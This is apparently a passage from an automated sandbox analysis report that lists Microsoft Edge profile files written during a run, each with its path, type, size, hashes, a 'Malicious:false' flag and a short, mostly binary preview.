                                                                                                                                                                                                                                                                        SHA-512:00EBDEA7A432B085BDD15DB33F693ED655567E1F8741BAE218E307DA70AD562D3CA37BD651589401CAB743F629BADBE6FAB6A803F830CFCDA5FA657EA16E62AA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379757632293900","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                                                                                                                        Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                        MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                        SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                        SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                        SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                                        Entropy (8bit):0.10261748214866881
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:Gu0y14u0yt/589XCChslotGLNl0ml/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/c:+ymy7spEjVl/PnnnnnnnnnnnvoQ/Eou
                                                                                                                                                                                                                                                                        MD5:A9EB5ED1E36EFA6CD3A5471EE6248BF1
                                                                                                                                                                                                                                                                        SHA1:709F04C0641E12B279C31CDC81BB03EE098164BA
                                                                                                                                                                                                                                                                        SHA-256:9210E76D2D8AC121F05F1992BE9E6F2A058F755C0565D32A4EE4F7E1ECF55E1A
                                                                                                                                                                                                                                                                        SHA-512:1FCCA93C73938E0A34605D835BABED553810F147BADB8ADAD8439A28689B07602700A2C1349B3D45B8F3A33BA768545118D2B1DDDB8F22E10C017D5E6AC9EF9C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:..-.............M...............4..}......Wc;z..-.............M...............4..}......Wc;z........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):317272
                                                                                                                                                                                                                                                                        Entropy (8bit):0.8895901336432999
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:G2Xluq0qTRHKCxUCCDkkhC8WtCraWCqcECo3xX1YCPMv8PyJyy9ySylVyAxywY:7+Nk
                                                                                                                                                                                                                                                                        MD5:D1E045381F11480A2F5FCB4EBD373958
                                                                                                                                                                                                                                                                        SHA1:78DE8C62376D01DD495B4A36D70366083F6A05DC
                                                                                                                                                                                                                                                                        SHA-256:80EEF63D5C9297CE28D29A812543D7F3A4785AFD3FA51E9F00B104E7E8069796
                                                                                                                                                                                                                                                                        SHA-512:3F3F2891C46E089645DCEE1BC45E34A68B2F7BCE51A0A0B80C6E0E1B01F1917B178A5F3D744162C67354B1F78746D049D033B96BCADD4672F834C61A08D6BC03
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):694
                                                                                                                                                                                                                                                                        Entropy (8bit):3.538093009524339
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:Wlc8NOuuuuuuuuuuuuuuuuuuuuuu3llkTdU8y:iD+lkS
                                                                                                                                                                                                                                                                        MD5:ED2EF59D793A5FA9745FF670173C0D7F
                                                                                                                                                                                                                                                                        SHA1:6221862CA3D3BF8D3B5BA727D6EC547EE3C797CF
                                                                                                                                                                                                                                                                        SHA-256:438FD58E8E4C7B5DEB71481699D39CED54E77DE6BB887E057B845A18FD2D2235
                                                                                                                                                                                                                                                                        SHA-512:33934E777A0D38B2195814C9E2E2DC449457BE29A8B44F296FF570FAD8A7DF85DA3D8C188856DBEA8C727ECD980E73A4EE9E5CA1E38813C0FCF42135A1CCB86E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............@..,;...............#38_h.......6.Z..W.F.....~.G.....~.G..........V.e................QQ..0................39_config..........6.....n ...1

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):321
                                                                                                                                                                                                                                                                        Entropy (8bit):5.121902950156752
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+VU+q2P923oH+TcwtfrK+IFUt8PF+uMJZmw+PF+uM9VkwO923oH+TcwtfrUeLJ:1pv4Yeb23FUt87e/+7S5LYeb3J
                                                                                                                                                                                                                                                                        MD5:2B6FB272E3CC688AFF933662822FF80A
                                                                                                                                                                                                                                                                        SHA1:EC2CDAE7C39F16E217AD5AAEDE95BA43F868115B
                                                                                                                                                                                                                                                                        SHA-256:6C784900636670A9CD86C71CC0D480168ADFB69EFBC99E99F06E13D9255A9630
                                                                                                                                                                                                                                                                        SHA-512:25A99688D2BE5EC589DE330305CA85FC156C6DABCF57ADEC8056280E7A9DBA77F47B5887AD14EE47D9BBBD8DC36954E4096F632C4DB30BC2ED6499346F886C11
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:32.330 2e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-02:20:32.331 2e8 Recovering log #3.2024/12/27-02:20:32.331 2e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):321
                                                                                                                                                                                                                                                                        Entropy (8bit):5.121902950156752
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+VU+q2P923oH+TcwtfrK+IFUt8PF+uMJZmw+PF+uM9VkwO923oH+TcwtfrUeLJ:1pv4Yeb23FUt87e/+7S5LYeb3J
                                                                                                                                                                                                                                                                        MD5:2B6FB272E3CC688AFF933662822FF80A
                                                                                                                                                                                                                                                                        SHA1:EC2CDAE7C39F16E217AD5AAEDE95BA43F868115B
                                                                                                                                                                                                                                                                        SHA-256:6C784900636670A9CD86C71CC0D480168ADFB69EFBC99E99F06E13D9255A9630
                                                                                                                                                                                                                                                                        SHA-512:25A99688D2BE5EC589DE330305CA85FC156C6DABCF57ADEC8056280E7A9DBA77F47B5887AD14EE47D9BBBD8DC36954E4096F632C4DB30BC2ED6499346F886C11
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:32.330 2e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-02:20:32.331 2e8 Recovering log #3.2024/12/27-02:20:32.331 2e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):787
                                                                                                                                                                                                                                                                        Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                        MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                        SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                        SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                        SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):339
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1326426153195905
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+EDt+q2P923oH+TcwtfrzAdIFUt8PF+ED5Zmw+PF+EJEVkwO923oH+TcwtfrzS:kcv4Yeb9FUt8PN/+Pu5LYeb2J
                                                                                                                                                                                                                                                                        MD5:2CAAB0290A02A7460F7B433C4E7FC9FE
                                                                                                                                                                                                                                                                        SHA1:865B1CBB9EF576FD3E79CD2B1ABD92D040E62A3F
                                                                                                                                                                                                                                                                        SHA-256:8518E28E53DFBB1177B8CE63B6726DDD22C9C1CB9C4F0115FEC1CC6C6F81DC3F
                                                                                                                                                                                                                                                                        SHA-512:554C38303336E801C5418A35BC6A1A78232A888863772F1C70D5E5A1C1988FBBEFF52F37E3275D2233D9F937080DF48184A2E501BBED70C82D38DFB76282120F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:32.325 2e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/27-02:20:32.325 2e8 Recovering log #3.2024/12/27-02:20:32.326 2e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):339
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1326426153195905
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+EDt+q2P923oH+TcwtfrzAdIFUt8PF+ED5Zmw+PF+EJEVkwO923oH+TcwtfrzS:kcv4Yeb9FUt8PN/+Pu5LYeb2J
                                                                                                                                                                                                                                                                        MD5:2CAAB0290A02A7460F7B433C4E7FC9FE
                                                                                                                                                                                                                                                                        SHA1:865B1CBB9EF576FD3E79CD2B1ABD92D040E62A3F
                                                                                                                                                                                                                                                                        SHA-256:8518E28E53DFBB1177B8CE63B6726DDD22C9C1CB9C4F0115FEC1CC6C6F81DC3F
                                                                                                                                                                                                                                                                        SHA-512:554C38303336E801C5418A35BC6A1A78232A888863772F1C70D5E5A1C1988FBBEFF52F37E3275D2233D9F937080DF48184A2E501BBED70C82D38DFB76282120F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:32.325 2e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/27-02:20:32.325 2e8 Recovering log #3.2024/12/27-02:20:32.326 2e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):120
                                                                                                                                                                                                                                                                        Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                        MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                        SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                        SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                        SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                                        Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                        MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                        SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                        SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                        SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:117.0.2045.47

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                        Entropy (8bit):6.09074410160948
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMzwuF9hDO6vP6O+etbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEH6ntbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                        MD5:4E2000BC4580BB65AAB7FB71F15F1108
                                                                                                                                                                                                                                                                        SHA1:A05BB3B3647986AFBB19951661996A1943A5E2C5
                                                                                                                                                                                                                                                                        SHA-256:3C736EBEE3E90E09176230967D5CA299C1780A36DEA8AEAD9D6D31984DF6B9F8
                                                                                                                                                                                                                                                                        SHA-512:15DD5FF87FF30EB8C6C292590F330E4E4E383FEE307A262C6ECD3FE5C643D38F0F6BFBDA6C9B7D88267B695849C7644B11BAF908D9431BC6A2C5264472434742
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a5a7.TMP (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                        Entropy (8bit):6.09074410160948
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMzwuF9hDO6vP6O+etbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEH6ntbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                        MD5:4E2000BC4580BB65AAB7FB71F15F1108
                                                                                                                                                                                                                                                                        SHA1:A05BB3B3647986AFBB19951661996A1943A5E2C5
                                                                                                                                                                                                                                                                        SHA-256:3C736EBEE3E90E09176230967D5CA299C1780A36DEA8AEAD9D6D31984DF6B9F8
                                                                                                                                                                                                                                                                        SHA-512:15DD5FF87FF30EB8C6C292590F330E4E4E383FEE307A262C6ECD3FE5C643D38F0F6BFBDA6C9B7D88267B695849C7644B11BAF908D9431BC6A2C5264472434742
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a605.TMP (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                        Entropy (8bit):6.09074410160948
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMzwuF9hDO6vP6O+etbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEH6ntbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                        MD5:4E2000BC4580BB65AAB7FB71F15F1108
                                                                                                                                                                                                                                                                        SHA1:A05BB3B3647986AFBB19951661996A1943A5E2C5
                                                                                                                                                                                                                                                                        SHA-256:3C736EBEE3E90E09176230967D5CA299C1780A36DEA8AEAD9D6D31984DF6B9F8
                                                                                                                                                                                                                                                                        SHA-512:15DD5FF87FF30EB8C6C292590F330E4E4E383FEE307A262C6ECD3FE5C643D38F0F6BFBDA6C9B7D88267B695849C7644B11BAF908D9431BC6A2C5264472434742
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a76c.TMP (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                        Entropy (8bit):6.09074410160948
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMzwuF9hDO6vP6O+etbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEH6ntbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                        MD5:4E2000BC4580BB65AAB7FB71F15F1108
